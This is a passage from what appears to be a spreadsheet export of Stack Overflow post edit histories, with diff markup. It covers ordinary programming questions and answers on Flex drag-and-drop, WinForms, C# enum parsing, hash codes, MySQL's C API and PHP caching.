 &lt;p&gt;&lt;span class="diff-delete"&gt; I've tested some more and what &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/10870/how-can-i-unaccept-a-drag-in-flex#11209"&gt;&lt;span class="diff-delete"&gt;@maclema&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; works, but not if you run in AIR. It seems like drag and drop in AIR is different. It's really, really weird because not only is the feedback not showing correctly, and it's not possible to unaccept, but the coordinates are also completely off. I just tried my application in a browser instead of AIR and dragging and dropping is completely broken.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Also, skipping the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;dragEnter&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; handler works fine in AIR, but breaks everything when running in a browser.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I've managed to get it working in both AIR and the browser now, but only by putting proxy components on top of the ranges of text where you should be able to drop things. That way I get the right feedback and drops are automatically unaccepted on drag exit.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; This is the oddest thing about D&amp;amp;D in AIR:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="default s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;DragManager.doDrag(initiator, &lt;span class="hljs-built_in"&gt;source&lt;/span&gt;, event, dragImage, offsetX, offsetY);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; In browser-based Flex, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;offsetX&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;offsetY&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; should be negative (so says the documentation, and it works fine). However, when running &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;exactly the same code&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; in AIR you have to make the offsets positive. The same numbers, but positive. That is very, very weird.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once I've called &lt;code&gt;DragManager.acceptDrag&lt;/code&gt; is there any way to "unaccept" the drag? Say that I have a view which can accept drag and drop, but only in certain areas. Once the user drags over one of these areas I call &lt;code&gt;DragManager.acceptDrag(this)&lt;/code&gt; (from a &lt;code&gt;DragEvent.DRAG_OVER&lt;/code&gt; handler), but if the user then moves out of this area I'd like to change the status of the drag to not accepted and show the &lt;code&gt;DragManager.NONE&lt;/code&gt; feedback. However, neither calling &lt;code&gt;DragManager.acceptDrag(null)&lt;/code&gt; nor &lt;code&gt;DragManager.showFeedback(DragManager.NONE)&lt;/code&gt; seems to have any effect. Once I've accepted the drag an set the feedback type I can't seem to change it.&lt;/p&gt; _x000D_
 &lt;p&gt; Just to make it clear: the areas where the user should be able to drop are not components or even display objects, in fact they are just ranges in the text of a text field (like the selection). Had they been components of their own I could have solved it by making each of them accept drag events individually. I guess I could create proxy components that float over the text to emulate it, but I'd rather not if it isn't necessary.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>casperOne</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should be able to create a generic form:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public partial class MyGenericForm&amp;lt;T&amp;gt; :_x000D_
    Form where T : class_x000D_
{_x000D_
    /* form code */_x000D_
    public List&amp;lt;T&amp;gt; TypedList { get; set; }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is valid &lt;code&gt;&lt;span class="diff-delete"&gt;C#&lt;/span&gt;&lt;/code&gt;, and compiles. However the designer won't work and the form will throw a runtime exception if you have any images stating that it cannot find the resource.&lt;/p&gt; _x000D_
 &lt;p&gt; I think this is because the windows forms designer assumes that the resources will be stored under the simple type's name.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should be able to create a generic form:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public partial class MyGenericForm&amp;lt;T&amp;gt; :_x000D_
    Form where T : class_x000D_
{_x000D_
    /* form code */_x000D_
    public List&amp;lt;T&amp;gt; TypedList { get; set; }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is valid &lt;span class="diff-add"&gt;C#&lt;/span&gt;, and compiles. However the designer won't work and the form will throw a runtime exception if you have any images stating that it cannot find the resource.&lt;/p&gt; _x000D_
 &lt;p&gt; I think this is because the windows forms designer assumes that the resources will be stored under the simple type's name.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm slowly learning Objective-C and Cocoa and the only way I see so far to capture key events in Text Views is to use delegation, but I'm having trouble finding useful documentation and examples on &lt;strong&gt;&lt;span class="diff-delete"&gt;how to implement such a solution&lt;/span&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; Can anyone help?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Well?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I'm slowly learning Objective-C and Cocoa&lt;span class="diff-add"&gt;,&lt;/span&gt; and the only way I see so far to capture key events in Text Views is to use delegation, but I'm having trouble finding useful documentation and examples on &lt;span class="diff-add"&gt;how to implement such a solution&lt;/span&gt;. Can anyone&lt;span class="diff-add"&gt; point me in the right direction or supply some first-hand&lt;/span&gt; help?&lt;span class="diff-add"&gt; Thanks in advance!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian Warshaw</t>
  </si>
  <si>
    <t>Pang</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a &lt;code&gt;&lt;span class="diff-delete"&gt;MySQL&lt;/span&gt;&lt;/code&gt; query that returns a result with a single column of integers. Is there any way to get the &lt;code&gt;&lt;span class="diff-delete"&gt;MySQL&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;C&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;API&lt;/span&gt;&lt;/code&gt; to transfer this as actually integers rather than as ASCII text? For that matter is there a way to get &lt;code&gt;&lt;span class="diff-delete"&gt;MySQL&lt;/span&gt;&lt;/code&gt; to do /any/ of the API stuff as other than ASCII text. I'm thinking this would save a bit of time in sprintf/sscanf or whatever else is used as well as in bandwidth.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a &lt;span class="diff-add"&gt;MySQL&lt;/span&gt; query that returns a result with a single column of integers. Is there any way to get the &lt;span class="diff-add"&gt;MySQL C API&lt;/span&gt; to transfer this as actually integers rather than as ASCII text? For that matter is there a way to get &lt;span class="diff-add"&gt;MySQL&lt;/span&gt; to do /any/ of the API stuff as other than ASCII text. I'm thinking this would save a bit of time in sprintf/sscanf or whatever else is used as well as in bandwidth.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The problem here is that the browsers specifically work to block anything that changes the basic file upload input control. You can't change it with javascript for instance.&lt;/p&gt; _x000D_
 &lt;p&gt; The reason is security - if I could script it I could build a page that when you visited it sent me various files from your hard disk. Not nice.&lt;/p&gt; _x000D_
 &lt;p&gt; There are various workarounds at the moment, but they're different between IE and FX (I don't know about Safari, Opera, etc).&lt;/p&gt; _x000D_
 &lt;p&gt; Look at what &lt;a href="http://www.gmail.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Gmail&lt;/span&gt;&lt;/a&gt; does in IE and FX when you attach something to an e-mail.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to see that rubbish "Browse" button - it tells me that I'm not letting anything unexpected in.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The problem here is that the browsers specifically work to block anything that changes the basic file upload input control. You can't change it with javascript for instance.&lt;/p&gt; _x000D_
 &lt;p&gt; The reason is security - if I could script it I could build a page that when you visited it sent me various files from your hard disk. Not nice.&lt;/p&gt; _x000D_
 &lt;p&gt; There are various workarounds at the moment, but they're different between IE and FX (I don't know about Safari, Opera, etc).&lt;/p&gt; _x000D_
 &lt;p&gt; Look at what &lt;a href="http://www.gmail.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.gmail.com&lt;/span&gt;&lt;/a&gt; does in IE and FX when you attach something to an e-mail.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to see that rubbish "Browse" button - it tells me that I'm not letting anything unexpected in.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JSW189</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; TortoiseSVN 1.5 has a neat hidden feature on the check in window:&lt;/p&gt; _x000D_
 &lt;p&gt; Select a missing file and a new file and right-click. One of the options will be "fix move".&lt;span class="diff-delete"&gt; In TortoiseSVN 1.8 you need to select both files for the option to show up in the context menu.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I tend to refactor away, and then use this to fix any files where the name has changed.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; TortoiseSVN 1.5 has a neat hidden feature on the check in window:&lt;/p&gt; _x000D_
 &lt;p&gt; Select a missing file and a new file and right-click. One of the options will be "fix move".&lt;/p&gt; _x000D_
 &lt;p&gt; I tend to refactor away, and then use this to fix any files where the name has changed.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>usr</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been reading a lot about closures and I think I understand them, but without clouding the picture for myself and others, I was wondering if anyone can explain closures as succinctly and clearly as possible to me and others? I'm looking for a simple explanation that might help me wrap my head around why I should be using them in certain instances.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Test rollback.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been reading a lot about closures and I think I understand them, but without clouding the picture for myself and others, I was wondering if anyone can explain closures as succinctly and clearly as possible to me and others? I'm looking for a simple explanation that might help me wrap my head around why I should be using them in certain instances.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jfs</t>
  </si>
  <si>
    <t>knowncitizen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Before you prevent to close the form, please consider that it's not very nice to change the default behavior of Windows applications. It's like remapping the copy operation from &lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Ctrl&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt;+&lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;C&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; to some other key - it's simply unexpected.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you really want to do it, here's&lt;/span&gt; the &lt;span class="diff-delete"&gt;code&lt;/span&gt;:&lt;span class="diff-delete"&gt; you add an event handler for the &lt;/span&gt;&lt;a href="https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.form.formclosing?view=netframework-4.7.2" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;FormClosing&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; event.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;private void Form1_FormClosing(object sender, FormClosingEventArgs&lt;span class="diff-delete"&gt; e)_x000D_
{_x000D_
   &lt;/span&gt; &lt;span class="diff-delete"&gt;if (&lt;/span&gt;e&lt;span class="diff-delete"&gt;.CloseReason == CloseReason.UserClosing)_x000D_
    {_x000D_
        if (DialogResult == DialogResult.None&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;        &lt;/span&gt;    e.Cancel = true;_x000D_
&lt;span class="diff-delete"&gt;        }_x000D_
    &lt;/span&gt;}_x000D_
&lt;span class="diff-delete"&gt;}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;The comparison to &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;CloseReason.UserClosing&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; eliminates other causes such as Windows shutting down etc. See &lt;/span&gt;&lt;a href="https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.closereason?view=netframework-4.7.2" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;CloseReason&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; for the list of possible reasons.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The comparison&lt;/span&gt; to &lt;code&gt;&lt;span class="diff-delete"&gt;DialogResult.None&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; helps deciding if either the &lt;/span&gt;&lt;a href="https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.form.acceptbutton?view=netframework-4.7.2" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;AcceptButton&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; or the &lt;/span&gt;&lt;a href="https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.form.cancelbutton?view=netframework-4.7.2" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;CancelButton&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; of the form has been pressed instead of closing the form via&lt;/span&gt; &lt;kbd&gt;&lt;span class="diff-delete"&gt;Alt&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt;+&lt;/span&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;F4&lt;/span&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; or the equivalent system controls.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If&lt;/span&gt; you &lt;span class="diff-delete"&gt;want&lt;/span&gt; to &lt;span class="diff-delete"&gt;programmatically&lt;/span&gt; close the &lt;span class="diff-delete"&gt;form, either set the &lt;/span&gt;&lt;a href="https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.form.dialogresult?view=netframework-4.7.2" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;DialogResult&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; property before calling &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Close()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, or&lt;/span&gt;,&lt;span class="diff-delete"&gt; if&lt;/span&gt; you &lt;span class="diff-delete"&gt;really want &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;DialogResult.None&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, remove&lt;/span&gt; the event handler before closing the form:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;this.FormClosing -= new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing);_x000D_
this.Close();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;This does&lt;/span&gt; the &lt;span class="diff-add"&gt;job&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;private void Form1_FormClosing(object sender, FormClosingEventArgs e)_x000D_
{_x000D_
    e.Cancel = true;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Edit: In response&lt;/span&gt; to &lt;span class="diff-add"&gt;pix0rs concern&lt;/span&gt; &lt;span class="diff-add"&gt;- yes&lt;/span&gt; you &lt;span class="diff-add"&gt;are correct that you will not be able&lt;/span&gt; to &lt;span class="diff-add"&gt;programatically&lt;/span&gt; close the &lt;span class="diff-add"&gt;app. However&lt;/span&gt;, you &lt;span class="diff-add"&gt;can simply remove&lt;/span&gt; the event handler&lt;span class="diff-add"&gt; for the form_closing event&lt;/span&gt; before closing the form:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;this.FormClosing -= new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing);_x000D_
this.Close();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Thomas Weller</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's rather ugly:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = (StatusEnum) Enum.Parse(typeof(StatusEnum), "Active", true);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I tend to simplify this with:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ParseEnum&amp;lt;T&amp;gt;(string value)_x000D_
{_x000D_
    return (T) Enum.Parse(typeof(T), value, true);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then I can do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = EnumUtil.ParseEnum&amp;lt;StatusEnum&amp;gt;("Active");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; One option suggested in the comments is to add an extension, which is simple enough:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ToEnum&amp;lt;T&amp;gt;(this string value)_x000D_
{_x000D_
    return (T) Enum.Parse(typeof(T), value, true);_x000D_
}_x000D_
_x000D_
StatusEnum MyStatus = "Active".ToEnum&amp;lt;StatusEnum&amp;gt;();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, you may want to have a default enum to use if the string cannot be parsed:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ToEnum&amp;lt;T&amp;gt;(this string value, T defaultValue)&lt;span class="diff-delete"&gt; &lt;/span&gt; &lt;span class="diff-delete"&gt;_x000D_
    where T : struct &lt;/span&gt;_x000D_
{_x000D_
    if (string.IsNullOrEmpty(value))_x000D_
    {_x000D_
        return defaultValue;_x000D_
    }_x000D_
_x000D_
    T result;_x000D_
    return Enum.TryParse&amp;lt;T&amp;gt;(value, true, out result) ? result : defaultValue;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which makes this the call:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = "Active".ToEnum(StatusEnum.None);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However, I would be careful adding an extension method like this to &lt;code&gt;string&lt;/code&gt; as (without namespace control) it will appear on all instances of &lt;code&gt;string&lt;/code&gt; whether they hold an enum or not (so &lt;code&gt;1234.ToString().ToEnum(StatusEnum.None)&lt;/code&gt; would be valid but nonsensical) . It's often be best to avoid cluttering Microsoft's core classes with extra methods that only apply in very specific contexts unless your entire development team has a very good understanding of what those extensions do.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's rather ugly:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = (StatusEnum) Enum.Parse(typeof(StatusEnum), "Active", true);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I tend to simplify this with:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ParseEnum&amp;lt;T&amp;gt;(string value)_x000D_
{_x000D_
    return (T) Enum.Parse(typeof(T), value, true);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then I can do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = EnumUtil.ParseEnum&amp;lt;StatusEnum&amp;gt;("Active");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; One option suggested in the comments is to add an extension, which is simple enough:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ToEnum&amp;lt;T&amp;gt;(this string value)_x000D_
{_x000D_
    return (T) Enum.Parse(typeof(T), value, true);_x000D_
}_x000D_
_x000D_
StatusEnum MyStatus = "Active".ToEnum&amp;lt;StatusEnum&amp;gt;();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, you may want to have a default enum to use if the string cannot be parsed:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static T ToEnum&amp;lt;T&amp;gt;(this string value, T defaultValue) _x000D_
{_x000D_
    if (string.IsNullOrEmpty(value))_x000D_
    {_x000D_
        return defaultValue;_x000D_
    }_x000D_
_x000D_
    T result;_x000D_
    return Enum.TryParse&amp;lt;T&amp;gt;(value, true, out result) ? result : defaultValue;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which makes this the call:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StatusEnum MyStatus = "Active".ToEnum(StatusEnum.None);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However, I would be careful adding an extension method like this to &lt;code&gt;string&lt;/code&gt; as (without namespace control) it will appear on all instances of &lt;code&gt;string&lt;/code&gt; whether they hold an enum or not (so &lt;code&gt;1234.ToString().ToEnum(StatusEnum.None)&lt;/code&gt; would be valid but nonsensical) . It's often be best to avoid cluttering Microsoft's core classes with extra methods that only apply in very specific contexts unless your entire development team has a very good understanding of what those extensions do.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>DmitryBoyko</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The hash code of an object shouldn't be unique.&lt;/p&gt; _x000D_
 &lt;p&gt; The checking rule is:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-delete"&gt;Are the two hash&lt;/span&gt; codes equal? Then call the full (slow) &lt;code&gt;Equals&lt;/code&gt; method&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-delete"&gt;Are the two hash&lt;/span&gt; codes not equal? Then the two items are definitely not equal.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; All you want is a &lt;code&gt;GetHashCode&lt;/code&gt; algorithm that splits up your collection into roughly even groups - it shouldn't form the key as the &lt;code&gt;HashTable&lt;/code&gt; or &lt;code&gt;Dictionary&amp;lt;&amp;gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;. It needs&lt;/span&gt; to use the hash to optimise retrieval.&lt;/p&gt; _x000D_
 &lt;p&gt; How long do you expect the data to be? How random? &lt;span class="diff-delete"&gt;If&lt;/span&gt; lengths vary greatly (say for files) then just return the length. &lt;span class="diff-delete"&gt;If&lt;/span&gt; lengths are likely to be similar look at a subset of the bytes that varies.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;GetHashCode&lt;/code&gt; should be a lot quicker than &lt;code&gt;Equals&lt;/code&gt;, but&lt;span class="diff-delete"&gt; it&lt;/span&gt; doesn't need to be unique.&lt;/p&gt; _x000D_
 &lt;p&gt; Two identical things &lt;em&gt;must never&lt;/em&gt; have different hash codes. Two different objects &lt;em&gt;should not&lt;/em&gt; have the same hash code, but some collisions are to be expected (after all, there are more permutations than possible 32&lt;span class="diff-delete"&gt;-bit&lt;/span&gt; integers).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The hash code of an object shouldn't be unique.&lt;/p&gt; _x000D_
 &lt;p&gt; The checking rule is:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-add"&gt;Hash&lt;/span&gt; codes&lt;span class="diff-add"&gt; are&lt;/span&gt; equal? Then call the full (slow) &lt;code&gt;Equals&lt;/code&gt; method&lt;/li&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-add"&gt;Hash&lt;/span&gt; codes&lt;span class="diff-add"&gt; are&lt;/span&gt; not equal? Then the two items are definitely not equal.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; All you want is a &lt;code&gt;GetHashCode&lt;/code&gt; algorithm that splits up your collection into roughly even groups - it shouldn't form the key as the &lt;code&gt;HashTable&lt;/code&gt; or &lt;code&gt;Dictionary&amp;lt;&amp;gt;&lt;/code&gt;&lt;span class="diff-add"&gt; will need&lt;/span&gt; to use the hash to optimise retrieval.&lt;/p&gt; _x000D_
 &lt;p&gt; How long do you expect the data to be? How random? &lt;span class="diff-add"&gt; If&lt;/span&gt; lengths vary greatly (say for files) then just return the length. &lt;span class="diff-add"&gt; If&lt;/span&gt; lengths are likely to be similar look at a subset of the bytes that varies.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;GetHashCode&lt;/code&gt; should be a lot quicker than &lt;code&gt;Equals&lt;/code&gt;, but doesn't need to be unique.&lt;/p&gt; _x000D_
 &lt;p&gt; Two identical things &lt;em&gt;must never&lt;/em&gt; have different hash codes. Two different objects &lt;em&gt;should not&lt;/em&gt; have the same hash code, but some collisions are to be expected (after all, there are more permutations than possible 32&lt;span class="diff-add"&gt; bit&lt;/span&gt; integers).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Note that Zend Optimizer and MMCache (or similar applications) are totally different things. While Zend Optimizer tries to optimize the program opcode MMCache will cache the scripts in memory and reuse the precompiled code.&lt;/p&gt; _x000D_
 &lt;p&gt; I did some benchmarks some time ago and you can find the &lt;a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/" rel="nofollow noreferrer"&gt;results&lt;/a&gt; in my blog (in German though). The basic results:&lt;/p&gt; _x000D_
 &lt;p&gt; Zend Optimizer alone didn't help at all. Actually my scripts were slower than without optimizer.&lt;/p&gt; _x000D_
 &lt;p&gt; When it comes to caches:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; fastest: &lt;a href="http://eaccelerator.net/" rel="nofollow noreferrer"&gt;eAccelerator&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://xcache.lighttpd.net/" rel="nofollow noreferrer"&gt;XCache&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.php.net/manual/en/book.apc.php" rel="nofollow noreferrer"&gt;APC&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
